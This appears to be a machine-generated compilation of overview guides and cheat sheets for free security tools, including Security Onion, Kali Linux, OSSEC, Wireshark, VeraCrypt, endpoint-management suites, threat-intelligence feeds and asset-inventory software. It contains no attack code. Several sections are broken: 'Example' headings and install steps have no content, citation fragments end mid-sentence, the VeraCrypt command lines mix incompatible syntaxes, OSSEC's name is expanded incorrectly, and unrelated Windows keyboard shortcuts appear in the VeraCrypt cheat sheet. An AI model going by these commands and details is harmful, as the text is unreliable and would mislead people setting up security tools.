Legal Proceedings: Proper documentation and hash verification are critical for evidence admissibility .
Free digital forensics tools offer robust capabilities for evidence acquisition, analysis, and reporting. While they may lack some advanced features of commercial solutions, their reliability, community support, and extensibility make them indispensable for many investigations. Always combine multiple tools for comprehensive coverage, follow best practices, and stay engaged with the forensics community for the latest updates and support .
Security Onion is a powerful open-source platform for network security monitoring, intrusion detection, and log management. This guide provides a detailed overview, quick-reference cheat sheet, and best practices to help you deploy, operate, and troubleshoot Security Onion effectively.
Security Onion is designed for both small labs and large enterprise environments. Its architecture is modular and scalable, supporting several deployment modes:
Import Node: For importing pcap/evtx files; standalone, no live traffic.
Evaluation Mode: For temporary testing with live traffic sniffing.
Standalone Deployment: For labs or low-throughput environments; logs flow through Logstash → Redis → Elasticsearch.
Distributed Deployment: Recommended for production; includes manager, forward, and search nodes for scalability.
Heavy Nodes: For special cases requiring high resources .
Security Onion Desktop Environment
Network Security Monitoring (NSM)
Intrusion Detection (NIDS/HIDS)
Full Packet Capture
Log Management & SIEM
Dashboards & Visualization
Threat Hunting & Forensics
Alerting & Playbooks
Integration with open-source tools (Suricata, Zeek, Elastic Stack, etc.)
CPU: 2+ cores (4–8 recommended)
RAM: 16GB minimum (32GB+ for larger deployments)
Disk: 200GB–1TB+ (depends on retention and traffic)
Network: Dedicated TAP or SPAN port for monitoring
Home Lab: For learning and personal device protection.
Enterprise: Master server with 8+ cores, 16–128GB RAM, multi-TB storage.
Medium Network: 16–128GB RAM, 100Mbps–1Gbps throughput.
Download Security Onion ISO from the official website.
Create a VM (VirtualBox/VMware) or use dedicated hardware.
Allocate Resources: 16GB+ RAM, 2–4+ CPU cores, 200GB+ disk.
Configure Network: Add a management interface and a sniffing interface (TAP/SPAN).
Boot from ISO and follow the installation prompts:
Set hostname, IP, and domain.
Choose deployment mode (Standalone, Distributed, etc.).
Configure management and sniffing interfaces.
Complete Setup: Set up user accounts, passwords, and ensure internet access .
Network Traffic: Monitored via Suricata and Zeek.
Host Activity: Monitored via OSSEC.
Packet Capture: All traffic is captured for forensic analysis.
IDS Alerts: Generated by Suricata/Zeek based on signatures and heuristics.
Playbooks & Guided Analysis: Help triage and respond to alerts efficiently.
Pivoting: Move from alert review to threat hunting seamlessly .
Dashboards: Kibana provides customizable dashboards for visualizing events.
Hunt Menu: Enables proactive threat hunting.
Log Search: Elasticsearch allows fast querying of logs and events .
APIs & Connectors: Security Onion and its components (Elastic Stack, Zeek, Suricata) support APIs for integration.
SIEM Integration: Can forward logs to external SIEMs.
Threat Intelligence: Integrate with platforms like MISP for threat sharing.
Best Practices: Use standards-based integration, secure APIs, and follow access control best practices .
Use dedicated hardware for production; avoid resource contention in VMs.
Allocate sufficient resources (RAM, CPU, disk).
Use local storage over network storage for performance.
Set hostname/IP correctly during install; avoid changes post-install.
Avoid third-party software that may conflict with Security Onion.
Use TAPs instead of SPAN ports for reliable traffic capture.
Regularly update Security Onion; test updates in non-production first.
Engage with the community for support and shared knowledge .
Service Status: Use sudo so-status
to check all services.
Log Flow: Use tcpdump
and check logs for issues in Syslog-ng, Logstash, Elasticsearch.
Network Connectivity: Use ping
and nc
to verify node communication.
Resource Contention: Ensure VMs have dedicated resources.
File Permissions: Avoid manual changes; test hardening guidelines before applying.
Third-Party Conflicts: Do not install conflicting security agents or software .
Official Documentation:
Forums & Community: Engage on official forums, Reddit, and Stack Overflow.
Case Studies & Use Cases: Search for real-world deployments and success stories.
User Groups: Join community-driven groups for shared learning .
Update regularly: sudo soup
Test in lab before production changes.
Monitor resource usage: htop
, free -m
, df -h
Backup configs before upgrades.
All information in this guide is based on the latest research and community best practices as of June 2025, and is supported by the provided research reports –.
For more details, always refer to the .
Kali Linux is a powerful, Debian-based distribution designed for digital forensics, penetration testing, and cybersecurity research. This guide provides a thorough overview, including fundamentals, installation, security best practices, tool usage, and further learning resources.
Kali Linux is maintained by Offensive Security and is the successor to BackTrack Linux (2006–2013). It is tailored for security professionals, ethical hackers, and digital forensics experts. The name "Kali" is inspired by the Hindu goddess of time and change, reflecting the dynamic nature of the included tools .
Latest Version (2025.2) Highlights:
Menu Reorganization: Now follows the MITRE ATT&CK framework for easier tool discovery.
Desktop Updates: GNOME 48, KDE 6.3.
BloodHound Community Edition: Enhanced for Active Directory analysis.
NetHunter Enhancements: Wi-Fi injection for TicWatch Pro 3, new car hacking toolset (CARsenal).
13 New Tools: Plus updates to existing ones.
Security & Privacy: Built-in tools for anonymity (Tor, proxychains).
Customization: Highly flexible for user needs.
Active Community: Regular updates and support .
Standard Install: Download ISO, create bootable USB/DVD, install on hardware.
Virtual Machine: Use VMware or VirtualBox for isolated environments.
Network Install: Deploy over a network for multiple machines.
Live Boot: Run directly from USB without installation [[Standard Practices]].
CPU: Modern multi-core processor.
RAM: Minimum 2GB (more recommended).
Storage: At least 20GB.
Network: Required for updates and tool downloads.
Download only from the .
Verify checksums of downloaded ISOs.
Create backups before installation.
Close unnecessary applications during install.
Customize tool selection during setup.
Document installation steps for reproducibility.
Test all features post-installation.
Keep the system and tools updated [[Standard Practices]].
LUKS Full-Disk Encryption: Protects sensitive data.
Forensics Mode: Prevents auto-mounting of storage devices for data integrity .
Regular Updates: Use apt update && apt upgrade
frequently .
Firewall: Enable and configure UFW:
Disable Unnecessary Services:
Automatic Security Updates:
Antivirus: Install ClamAV for malware scanning.
Change all default passwords.
Use unprivileged accounts for daily tasks.
Prefer SSH key authentication over passwords.
Remove unused software.
Disable root login; use sudo
for admin tasks .
Nmap (Network Scanning)
Metasploit Framework (Exploitation)
Wireshark (Packet Analysis)
Aircrack-ng (Wireless Attacks)
Hydra (Password Cracking)
John the Ripper (Password Cracking)
Burp Suite (Web App Testing)
Netcat (Networking)
Official Documentation:
Online Courses: MIT OpenCourseWare, Google for Education.
Community Resources: OER Commons, RDA Toolkit, CERT training.
Forums & Support: Kali Linux Forums, Reddit r/Kalilinux, Stack Overflow.
Government/Education: U.S. Department of Education cybersecurity resources .
Always use the latest version and keep tools updated.
Harden your system before using it for sensitive tasks.
Use strong, unique passwords and SSH keys.
Limit root access and use sudo
.
Regularly back up important data.
Engage with the community for support and updates.
All information in this guide is based on the latest official documentation, community resources, and best practices as of June 2025 .
This cheat sheet is designed to be a living document—refer to the and community forums for the most up-to-date information and advanced usage tips.
OSSEC (Open Source Security Event Correlator) is a powerful, open-source, host-based intrusion detection system (HIDS). It provides log analysis, file integrity checking, policy monitoring, rootkit detection, real-time alerting, and active response across multiple platforms (Linux, Windows, macOS, Solaris, BSD) .
OSSEC uses a client-server (manager-agent) architecture:
Manager (Server): Central component that receives, stores, and analyzes data from agents and other sources. It generates alerts and manages responses .
Agents: Installed on monitored endpoints. They collect logs, monitor files, and send data to the manager.
Agentless Monitoring: For devices that cannot run an agent (e.g., routers, switches), OSSEC can collect logs via SSH, WMI, or syslog.
Decoders: Parse and normalize log messages.
Rules: Define what constitutes suspicious or malicious activity.
Active Responses: Automated actions triggered by specific events (e.g., block IP, disable account) .
Log Analysis: Real-time analysis of logs from various sources (syslog, Windows Event Logs, application logs).
File Integrity Monitoring (FIM): Detects unauthorized changes to critical files.
Rootkit Detection: Scans for rootkits and suspicious binaries.
Registry Monitoring: Monitors Windows registry changes.
Real-Time Alerting: Immediate notification of security events.
Active Response: Automated mitigation actions.
Centralized Management: Unified policy enforcement and alerting .
Linux/Unix: Most distributions supported.
Windows: All major versions.
macOS, Solaris, BSD: Supported.
Single Host: Manager and agent on the same machine.
Distributed: Central manager with multiple agents across the network.
Agentless: For devices that cannot run an agent.
Download OSSEC:
Run Installer:
Choose "server" or "agent" as appropriate.
Configure Firewall: Allow communication on the default port (1514/UDP).
Start OSSEC:
Agent Registration: On the manager, add agents and provide keys for secure communication.
For Windows, use the provided installer and follow the GUI prompts.
Use configuration management tools (Ansible, Puppet, Chef).
For agentless, configure SSH/WMI access.
The main configuration file is /var/ossec/etc/ossec.conf
. It is XML-based and controls all aspects of OSSEC.
Key Sections:
<global>
: General settings.
<rules>
: Rule files to load.
<decoders>
: Decoder files to load.
<active-response>
: Automated response actions.
<syscheck>
: File integrity monitoring.
<rootcheck>
: Rootkit detection.
<alerts>
: Alerting configuration.
Example ossec.conf Snippet
Location: /var/ossec/etc/rules/
Format: XML
Purpose: Define what log patterns trigger alerts.
Customization: Add custom rules for your environment. Always back up custom rules before upgrades .
Example Rule
Location: /var/ossec/etc/decoders/
Purpose: Parse and extract fields from log messages.
Customization: Write custom decoders for unique log formats. Back up before upgrades .
Example Decoder
Purpose: Automate mitigation (e.g., block IP, disable user).
Configuration: Each response in its own <active-response>
block in ossec.conf
.
Key Options:
command
: The script or action to run.
location
: Where to execute (local, server, agent).
level
: Minimum alert level to trigger.
timeout
: How long the response lasts.
Example Active Response
Log Sources: Internal logs, Windows Event Logs, syslog, application logs.
Logcollector: Collects events from sources.
Analysisd: Decodes, filters, and classifies events in real-time .
Supported Formats: syslog, snort, squid, IIS, MySQL, PostgreSQL, Apache, and more .
Capabilities: Detects attacks, misuse, policy violations, and system errors .
Real-Time Alerts: Immediate notification via email, syslog, or custom scripts .
Alert Levels: 0 (ignore) to 15 (critical).
Active Response: Automated actions (e.g., block IP, restart service).
Centralized Policy Enforcement: Uniform security policies across all monitored devices .
SIEM Integration: OSSEC can send logs/alerts to SIEMs like ELK Stack (Elasticsearch, Logstash, Kibana), Graylog, and Splunk for advanced analysis and visualization .
Other Security Tools: Integrates with Snort, Suricata, Zeek for network security monitoring .
Log Management: Centralized log collection and advanced search via Graylog or Elastic Stack .
Community Support: Strong community for plugins, integrations, and troubleshooting .
Identify Problems: Check logs in /var/ossec/logs/
for errors.
Systematic Approach: Isolate the issue (agent, manager, network).
Diagnostic Tools: Use OSSEC's built-in tools and system utilities.
Common Issues: Agent connectivity, rule misconfiguration, permission errors.
Preventive: Regularly update OSSEC, review rules/decoders, and back up configurations .
Corrective: Address alerts and incidents promptly, verify system integrity .
Routine: Clean up old logs, rotate log files, and monitor system performance.
Backup: Always back up custom rules, decoders, and configuration files before upgrades .
Least Privilege: Run OSSEC with minimal required permissions.
Regular Updates: Keep OSSEC and all dependencies up to date.
Training: Ensure staff are trained on OSSEC operation and incident response .
Feedback Loops: Review and refine rules based on incident feedback .
Official Website:
GitHub:
Forums: OSSEC Google Group, Stack Overflow, Reddit
Documentation:
Related Projects: (OSSEC fork with extended features)
Blogs & Case Studies: Search for real-world use cases and example configurations on GitHub, company blogs, and security forums.
Wireshark is the world’s most popular open-source network protocol analyzer, used for network troubleshooting, analysis, software and protocol development, and education. This guide provides a thorough overview, practical tips, and a quick-reference cheat sheet to help you master Wireshark.
Wireshark is a powerful, open-source network protocol analyzer that captures and displays data packets traveling through a network in real time or from saved files. It is widely used by network administrators, security professionals, and developers for troubleshooting, security analysis, and protocol development .
Key Features:
Cross-platform (Windows, macOS, Linux)
Live capture and offline analysis
Deep inspection of hundreds of protocols
Powerful filtering capabilities
User-friendly graphical interface
Modular, extensible architecture
Wireshark 3.6 Screenshot
Requirements: Windows 10 or later, 1 GHz CPU, 2 GB RAM, 16–20 GB disk space
Install: Download from , run installer, follow prompts .
Requirements: Compatible kernel, 2 GB RAM, sufficient disk space, root/sudo access
Install: Use package manager (e.g., sudo apt install wireshark
), configure permissions for non-root capture .
Requirements: Supported macOS version, 2 GB RAM, sufficient disk space
Install: Download from website or use Homebrew (brew install wireshark
) .
Note: Ensure your network interface supports promiscuous mode for full packet capture.
Wireshark’s interface is designed for efficient navigation and analysis:
Main Menu Bar: File, Edit, View, Go, Capture, Analyze, Statistics, Help .
Main Toolbar: Quick access to start/stop capture, open/save files, apply filters.
Filter Toolbar: Enter display filters to refine packet view .
Interface List: Select network interface for capture.
Packet List Pane: Shows captured packets (number, time, source, destination, protocol, info).
Packet Details Pane: Hierarchical breakdown of selected packet’s protocol layers .
Packet Bytes Pane: Raw packet data in hexadecimal .
Packet Analysis: Captures and dissects network packets, showing headers, payloads, and protocol details .
Network Sniffing: Intercepts and logs network traffic for analysis.
Open Source: Free, community-driven, extensible.
Modular Architecture: Capture engine (pcap), protocol dissectors, GUI .
Promiscuous Mode: Captures all packets on the network segment.
Monitor Mode: For wireless networks, captures all wireless traffic .
Start/Stop Capture: Select interface, click the shark fin icon to start, red square to stop.
Save/Export: Save captures as .pcap
files for later analysis.
Set before capture to limit what is recorded.
Syntax: Based on libpcap (tcpdump) language.
Examples:
Capture only HTTP: tcp port 80
Capture traffic from IP: host 192.168.1.1
Capture only TCP: tcp
Set in: Capture Options dialog .
Set after capture to refine what is shown.
Syntax: Wireshark-specific, more flexible.
Examples:
Show packets from IP: ip.addr == 192.168.1.1
Show DNS traffic: dns
Show TCP SYN packets: tcp.flags.syn == 1
Apply in: Filter toolbar .
Packet Dissection: View protocol layers and fields in detail.
Protocol Decoding: Human-readable decoding for hundreds of protocols.
Filtering: Both capture and display filters for focused analysis.
Statistics Tools: Protocol hierarchy, conversations, endpoints, IO graphs.
Expert Information: Highlights errors, warnings, and protocol violations .
Troubleshooting: Diagnose slow networks, dropped connections, misconfigurations.
Security Analysis: Detect unauthorized access, malware, data exfiltration.
Performance Optimization: Identify bottlenecks, excessive retransmissions.
Compliance Verification: Ensure protocol standards are followed.
Protocol Development: Test and debug new or modified protocols .
Identify the Problem: Gather logs, error messages, user reports .
Determine Scope: Isolate affected systems or segments .
Establish Theory: Hypothesize likely causes based on symptoms .
Test Theory: Use Wireshark to confirm or refute hypotheses .
Propose & Test Solution: Implement fixes, monitor results.
Collect Sufficient Data: Replicate issues, ensure enough packet data is captured.
Use Actionable Filters: Apply specific filters to focus on relevant traffic.
Analyze Patterns: Look for anomalies, repeated errors, or protocol violations .
Network Forensics: Analyzing malware (e.g., Zeus Botnet), reconstructing attacks.
CTF Challenges: Used in security competitions for traffic analysis.
Malware Traffic Analysis: Identifying command-and-control traffic, data exfiltration.
DNS Troubleshooting: Diagnosing resolution failures, cache poisoning.
Real-Time Forensics: Portable Wireshark setups for incident response.
Performance Analysis: Identifying latency, retransmissions, and bottlenecks .
Only TCP: tcp
Only UDP: udp
Only HTTP: tcp port 80
Only traffic from IP: host 192.168.1.1
Only traffic to/from subnet: net 192.168.1.0/24
Only traffic to port: port 443
All HTTP: http
All DNS: dns
Source IP: ip.src == 192.168.1.1
Destination IP: ip.dst == 10.0.0.5
TCP SYN packets: tcp.flags.syn == 1
TCP retransmissions: tcp.analysis.retransmission
Show only errors: tcp.analysis.flags && !tcp.analysis.ack_rtt
Protocol Hierarchy: Statistics > Protocol Hierarchy
Conversations: Statistics > Conversations
Endpoints: Statistics > Endpoints
IO Graphs: Statistics > IO Graphs
Coloring Rules: Use to highlight traffic types (View > Coloring Rules).
Profiles: Create profiles for different analysis scenarios (Edit > Configuration Profiles).
Expert Info: Use for quick error/warning overview (Analyze > Expert Information).
By mastering these concepts, techniques, and shortcuts, you can leverage Wireshark for everything from basic troubleshooting to advanced network forensics and security analysis. Wireshark’s flexibility and depth make it an indispensable tool for anyone working with networks .
VeraCrypt is a free, open-source disk encryption software designed to secure your data through robust encryption algorithms and advanced features. This guide provides a thorough overview, practical instructions, and a quick-reference cheat sheet for both beginners and advanced users.
Whole-Disk & Partition Encryption: Encrypts entire disks or partitions, including system drives, with pre-boot authentication.
Hidden Volumes & OS: Supports hidden volumes and even hidden operating systems for plausible deniability.
Multiple Encryption Algorithms: Choose from AES, Serpent, Twofish, Camellia, Kuznyechik, and combinations thereof.
Cross-Platform: Available for Windows, macOS, and Linux.
Open Source & Free: No cost, with transparent code and regular security audits.
Rescue Disk: Create a rescue disk for system recovery in case of bootloader or decryption issues.
No Cloud Integration: Focuses on local encryption only.
Command-Line Support: Enables scripting and automation for advanced users.
Latest Version: As of May 30, 2025, the latest stable release is 1.26.24 .
Download the .exe
installer from the .
Run the installer, accept the license, choose the installation directory, and follow prompts.
Launch VeraCrypt from the Start Menu or desktop shortcut .
Download the .dmg
file.
Open and mount the disk image, then drag VeraCrypt to the Applications folder.
Authorize the app in Security & Privacy settings if prompted.
Debian/Ubuntu:
sudo dpkg -i veracrypt-setup.deb
Red Hat/Fedora:
sudo rpm -ivh veracrypt-setup.rpm
From Source: Extract the source, then follow the build instructions in the README.
15 algorithms and 5 hash functions (75 combinations).
Default: AES-256 with SHA-512.
Other options: Serpent, Twofish, Camellia, Kuznyechik, and combinations .
File Containers: Encrypted volumes stored as files; portable and flexible.
Device-Hosted Volumes: Encrypts entire partitions or drives for higher security .
Launch VeraCrypt and click "Create Volume".
Select Volume Type: Standard or Hidden.
Specify Location: Choose file path (for file containers) or device/partition.
Choose Algorithms: Select encryption and hash algorithms (default is safe).
Set Size: Define the container size.
Set Password: Use a strong, unique password.
Generate Randomness: Move your mouse randomly in the window to increase cryptographic strength.
Format & Create: Complete the process to create the encrypted volume .
Open VeraCrypt.
Select a drive letter.
Click "Select File" or "Select Device" and choose your volume.
Click "Mount" and enter your password.
CLI Benefits: Faster, scriptable, and resource-efficient .
Mount a Volume:
veracrypt /path/to/container /letter /p password
Dismount a Volume:
veracrypt /d /letter
Create a Volume (Wizard):
veracrypt --create
Automate Tasks: Use batch files or shell scripts to mount/dismount volumes at login, backup, or shutdown .
Use Strong Passwords: For both outer and hidden volumes .
Keep VeraCrypt Updated: Regularly check for updates and apply them.
Backup Data: Always keep backups of important data and rescue disks.
Protect Hidden Volumes: Enable "Protect hidden volume against damage" when mounting the outer volume .
Understand Your Threat Model: Know your risks and plan accordingly.
Purpose: Conceal sensitive data within an outer volume.
Creation: During volume creation, select "Hidden VeraCrypt volume".
Protection: When mounting the outer volume, enable protection for the hidden volume by entering both passwords .
How It Works: Hidden volumes are indistinguishable from random data; adversaries cannot prove their existence .
Limitations: Not foolproof—coercion or legal requirements may still pose risks .
Best Use: In situations where you may be forced to reveal a password, but need to keep some data secret .
Identify the Problem: Note error messages and recent changes .
Basic Checks: Ensure all connections and power sources are secure .
Research: Use forums and online resources for similar issues .
Divide and Conquer: Test individual settings and configurations .
Test Solutions: Try one fix at a time and document results .
Use Diagnostic Tools: Leverage VeraCrypt’s built-in tools and logs .
Seek Help: Don’t hesitate to ask in forums or communities .
Prevent Recurrence: Update software and follow best practices .
Data Security for Professionals: Healthcare, finance, and legal sectors use VeraCrypt to protect sensitive data.
Fraud Prevention: Encrypts transaction data in financial services.
Secure Data Sharing: Encrypt files before sharing via USB or email.
Regulatory Compliance: Helps meet GDPR and other data protection requirements.
Personal Privacy: Protects personal files and sensitive information on laptops and USB drives.
Integration: Can be used alongside firewalls and intrusion detection systems for comprehensive security .
Mount Volume: Select drive letter → Select File/Device → Mount
Dismount Volume: Select mounted volume → Dismount
Create Volume: Tools → Volume Creation Wizard
Mount Volume:
veracrypt /path/to/container /letter /p password
Dismount Volume:
veracrypt /d /letter
Create Volume:
veracrypt --create
List Mounted Volumes:
veracrypt --list
Dismount All:
veracrypt -d
Ctrl + C/V/X/Z: Copy/Paste/Cut/Undo
Alt + Tab: Switch between open applications
Windows Key + D: Show desktop
Ctrl + Shift + Esc: Open Task Manager
Automate Mounting: Use scripts to mount volumes at startup.
Batch Processing: Use batch files for repetitive tasks.
Use Strong Passwords: Combine upper/lowercase, numbers, and symbols.
By following this guide and referencing the cheat sheet, you can maximize your use of VeraCrypt for both personal and professional data security needs. Always stay updated and practice good security hygiene for optimal protection.
This guide provides a detailed overview of free endpoint management tools, including their core features, user reviews, and compatibility with different operating systems (Windows, macOS, Linux/Unix, and cross-platform). It also highlights security, patch management, compliance, deployment, and remote monitoring capabilities.
Core Features: Asset management, software deployment, patch management, remote control, mobile device management, compliance reporting, and vulnerability management.
User Reviews: Highly regarded for its user-friendly interface and robust feature set. Popular among IT professionals for its comprehensive management capabilities .
Limitations: Free version may have restrictions on the number of endpoints or features compared to paid tiers.
Core Features: Automated patch management (OS and third-party apps), remote access, vulnerability scanning, scripting, automation, and reporting.
Security & Compliance: Automated vulnerability remediation, real-time compliance reports, and secure remote connections without extra software .
User Reviews: Praised for ease of use and comprehensive features at no cost for small environments .
Core Features: Open-source inventory management, software deployment, and network monitoring.
User Reviews: Powerful for large device inventories, but documentation and UI could be improved .
Core Features: Asset management, network scanning, software inventory.
User Reviews: Cost-effective for SMBs, with a good balance of features and usability .
Core Features: Automated endpoint management, device deployment, real-time compliance checks.
User Reviews: Noted for seamless Mac management and automation .
Core Features: Deep integration with Apple’s security framework, same-day support for new Apple releases, robust device management.
User Reviews: Industry standard for Apple device management, highly recommended for macOS environments .
Core Features: Cross-platform threat detection (including Windows threats on Mac), malware protection.
User Reviews: Valued for its security focus in mixed-OS environments .
Core Features: Unified endpoint management for macOS, Windows, iOS, and Android; mobile application management; compliance controls.
User Reviews: Praised for integration with Microsoft ecosystem and cross-platform support .
Core Features: Query Linux systems using SQL-like syntax for real-time visibility, configuration monitoring, and anomaly detection.
User Reviews: Highly flexible and powerful for system monitoring and security .
Core Features: Open-source breach and attack simulation tool, tests network resilience, identifies vulnerabilities.
User Reviews: Useful for security assessments and penetration testing .
Core Features: Configuration management, remote execution, orchestration, automation for Linux endpoints.
User Reviews: Known for scalability and flexibility in managing large Linux environments.
Core Features: Unified management for Windows, macOS, and Linux; policy enforcement; performance monitoring; security management.
User Reviews: Appreciated for its centralized dashboard and ability to manage diverse device types .
Core Features: Supports Android, Windows, iOS, macOS, Linux, ChromeOS; zero-trust access; device security; policy enforcement.
User Reviews: Valued for its broad OS support and unified management .
Core Features: Multi-OS support (macOS, Windows, iOS, Chrome OS, Android); asset management; software deployment.
User Reviews: Versatile for organizations with mixed device environments .
Core Features: Free patching, automation, reporting for up to 200 agents; remote access; asset management.
User Reviews: Strong for SMBs, easy to use, and feature-rich .
Core Features: Free monitoring, alerting, reporting; no trial required.
User Reviews: Robust monitoring solution for those seeking a no-cost option.
Core Features: Proactive monitoring, asset tracking, patching, secure remote support.
User Reviews: Trusted for remote support and monitoring .
Core Features: Remote desktop for Windows, iOS, Android; essential management features.
User Reviews: Good alternative to TeamViewer for small-scale use .
Automated Patch Management: Action1, ManageEngine Endpoint Central, and SuperOps offer automated patch deployment for OS and third-party apps, reducing vulnerability windows .
Security Features: Most tools provide antivirus management, firewall monitoring, and intrusion detection. Some, like CrowdStrike, focus on risk-based patching and compliance .
Compliance Tools: Real-time compliance reporting, vulnerability management, and policy enforcement are standard in leading free tools .
Deployment Methods: Most tools support cloud-based, on-premises, or hybrid deployments. Blue-green, canary, and rolling deployments are common strategies for minimizing downtime .
System Requirements: Vary by tool, but many support both vertical (hardware upgrades) and horizontal (adding more machines) scaling .
Scalability: Tools like SaltStack and cross-platform UEMs are designed to scale with organizational growth, supporting microservices and load balancing for large environments .
Ease of Use: Tools like Action1 and ManageEngine Endpoint Central are praised for their intuitive interfaces.
Support Quality: Community feedback highlights the importance of responsive support, especially for open-source tools.
Feature Set: Users value comprehensive features in free tiers, though some note limitations in scalability or advanced functions compared to paid versions .
Free endpoint management tools offer a wide range of features for organizations of all sizes and across all major operating systems. While free tiers may have limitations, they provide essential capabilities such as patch management, remote monitoring, compliance, and security. For mixed-OS environments, cross-platform tools like Bacon Unlimited, Scalefusion, and FileWave are highly recommended. For Windows, Action1 and ManageEngine Endpoint Central stand out, while Jamf and NinjaOne are top choices for macOS, and osquery and SaltStack excel on Linux/Unix. Community feedback consistently values ease of use, comprehensive features, and responsive support in these tools .
For best results, select a tool that matches your environment’s OS mix, required features, and scalability needs. Consider starting with a free tier and evaluating community feedback to ensure the tool aligns with your operational requirements.
This guide provides a detailed overview and quick-reference cheat sheet for major free threat intelligence platforms—including GreyNoise—and free vulnerability databases maintained by organizations such as the FBI, CISA, and MITRE. It covers platform features, integration capabilities, and technical standards to help you leverage these resources for cybersecurity operations.
Purpose: Filters out internet background noise to help security teams focus on real threats.
Key Features:
Real-time intelligence on mass internet scan and attack activity.
NOISE and RIOT databases for tagging threats and labeling common business services.
Reduces alert volume by ~25% by filtering benign internet noise.
Out-of-the-box integrations with SIEM, SOAR, TIP, and other security tools.
Community API (free): Basic IP lookups to check if an IP is associated with known noise or malicious activity.
Research Community Program: Free, non-commercial access to premium features for students, educators, and researchers.
No setup fees for free or paid tiers .
Purpose: Open-source platform for sharing structured threat intelligence.
Key Features:
Supports data models, threat feeds, event management, and sharing.
Automatic correlation of attributes and indicators.
Exports in XML, JSON, OpenIOC, STIX formats for interoperability.
Enhances detection and response through collaborative intelligence sharing .
Purpose: Collaborative platform for real-time threat intelligence sharing.
Key Features:
Pulse system for detailed threat reports (IOCs, references).
Continuously updated with latest malware, vulnerabilities, and threat data.
Fosters community-driven threat awareness and response .
Purpose: Manages and analyzes threat intelligence from multiple sources.
Key Features:
Unified framework for storing, organizing, and correlating threat knowledge.
Supports STIX and TAXII standards for data sharing.
Facilitates integration with other platforms and tools .
Purpose: Organizes observables, IOCs, and threats for actionable intelligence.
Key Features:
Collaborative environment for analysts.
Automated imports from various feeds.
Robust API for automation and customization .
Purpose: Malware analysis and reporting in a sandboxed environment.
Key Features:
Analyzes multiple file types (DLL, PDF, Office, URLs, etc.).
Generates detailed behavioral reports for suspicious files .
Known Exploited Vulnerabilities (KEV) Catalog:
Regularly updated list of vulnerabilities actively exploited in the wild.
As of June 2023, included 896 high-risk vulnerabilities.
Focuses on widely used systems (Windows, macOS, Linux).
Coordinated Vulnerability Disclosure (CVD) Program:
Collects and validates vulnerability reports from public and internal sources.
In FY24, coordinated 845 cases and produced 427 advisories.
Risk and Vulnerability Assessment (RVA):
One-on-one engagements to identify and mitigate organizational weaknesses.
Public Tools:
Open-source tools (e.g., Anchore) to check environments for KEV-listed vulnerabilities .
Common Vulnerabilities and Exposures (CVE) Program:
Standardized identifiers for publicly disclosed vulnerabilities.
Managed by MITRE, sponsored by DHS/CISA.
CVE List is a global reference for vulnerability management .
MITRE ATT&CK Framework:
Knowledge base of adversary tactics and techniques.
Used for threat modeling, detection, and response.
MITRE-Cyber-Security-CVE-Database (2025):
Aggregates CVE data from MITRE, NVD, CISA KEV, CVEDetails, Tenable, and more.
Open-source, supports community contributions, and automated updates.
Data available in JSON for easy integration .
Role: Primarily focused on cybercrime investigation, intelligence sharing, and response.
Key Resources:
Internet Crime Complaint Center (IC3): Collects public reports of internet crime.
National Cyber Investigative Joint Task Force (NCIJTF): Multi-agency task force for cyber threat response.
CyWatch: 24/7 operations center for incident tracking and communication.
Asset Forfeiture Program: Seizes assets from cybercriminals and compensates victims.
Vulnerability Database: The FBI does not maintain a public vulnerability database but collaborates with CISA and other agencies for alerts and advisories .
APIs: Most platforms (including GreyNoise, MISP, OpenCTI) offer APIs for integration with SIEM, SOAR, TIP, and other security tools.
STIX/TAXII Support:
STIX: Structured language for describing cyber threats (STIX 2.x uses JSON; STIX 1.x uses XML).
TAXII: Protocol for secure, automated exchange of threat intelligence.
Widely supported by platforms for interoperability and automated sharing .
SIEM Integration: Platforms can feed threat intelligence and vulnerability data into SIEMs for real-time alerting and correlation.
DevSecOps Integration: Tools can be embedded in CI/CD pipelines for automated vulnerability detection .
Threat Detection: Integrate threat intelligence feeds (GreyNoise, MISP, OTX) into your SIEM/SOAR for real-time alerting and context enrichment.
Vulnerability Management: Regularly consult CISA KEV, MITRE CVE, and MITRE-Cyber-Security-CVE-Database to prioritize patching and remediation.
Incident Response: Use FBI advisories and IC3 for reporting and understanding current cybercrime trends.
Automation: Leverage APIs and STIX/TAXII support for automated data ingestion and sharing across your security stack.
Research & Collaboration: Participate in community programs (e.g., GreyNoise Research Community) and contribute to open-source platforms for collective defense.
This summary and cheat sheet should equip you with a comprehensive understanding of the leading free threat intelligence platforms and vulnerability databases, along with practical guidance for integration and operational use.
This guide provides a detailed overview and quick-reference cheat sheet for the most popular free IT Asset Inventory management tools. It covers key features, technical specifications, deployment methods, integration capabilities, limitations, user feedback, and best practices for implementation.
Asset Discovery: Most tools support both manual entry/import and automated network scanning.
Inventory Management: All tools provide detailed tracking of hardware and software assets.
Reporting: Standard and custom reports are available in most tools.
Alerts/Notifications: Most tools can send alerts for asset changes, maintenance, or policy violations.
User Management: Role-based access control is common.
API/Integration: Open-source tools like Snipe-IT, GLPI, and Ralph 3 offer robust API support for integration with other systems .
Cloud-Based: AssetTiger, Spiceworks (cloud version)
On-Premises/Self-Hosted: Snipe-IT, GLPI, Ralph 3, Open-AudIT, OCS Inventory NG, CMDBuild
Hybrid: Some tools offer both cloud and on-premises options.
System Requirements:
Vary by tool, but most require a modern server (8+ CPU cores, 32+ GB RAM for larger deployments), and support Windows, Linux, and sometimes macOS.
All nodes in a deployment should run the same OS version for compatibility .
APIs: Snipe-IT, GLPI, Ralph 3, and others provide REST APIs for integration with ITSM tools (e.g., ServiceNow, Jira).
Middleware & Data Export/Import: Most tools support CSV/XML export/import and can be integrated via middleware or custom scripts.
Cloud & Virtualization: Many tools can be deployed on virtual machines or cloud platforms (AWS, Azure) .
AssetTiger: Free plan limited to 250 assets; advanced features may require paid plans.
Snipe-IT: Requires self-hosting and technical setup; cloud hosting is paid.
Spiceworks: Some users report performance issues with large inventories; ad-supported.
GLPI: Can be complex to configure for advanced use cases.
Open-AudIT/OCS Inventory: Community editions may lack some enterprise features; setup can be technical.
User Reviews:
Online reviews and forums are critical for understanding real-world performance and limitations.
Community support is strong for open-source tools, with active forums and documentation .
Organizational Assessment: Evaluate readiness, resources, and support before implementation.
Clear Specification: Define objectives, actors, and expected outcomes for asset management.
Automation: Use automated discovery and reporting where possible to reduce manual effort.
Integration: Leverage APIs and middleware for seamless integration with existing IT systems.
Continuous Feedback: Gather user feedback through surveys, forums, and direct engagement to improve processes.
Security & Compliance: Ensure deployments meet security standards and compliance requirements .
Compliance Audits: Track and report on software/hardware for regulatory compliance.
Lifecycle Management: Monitor asset acquisition, usage, maintenance, and disposal.
License Management: Track software licenses and renewals.
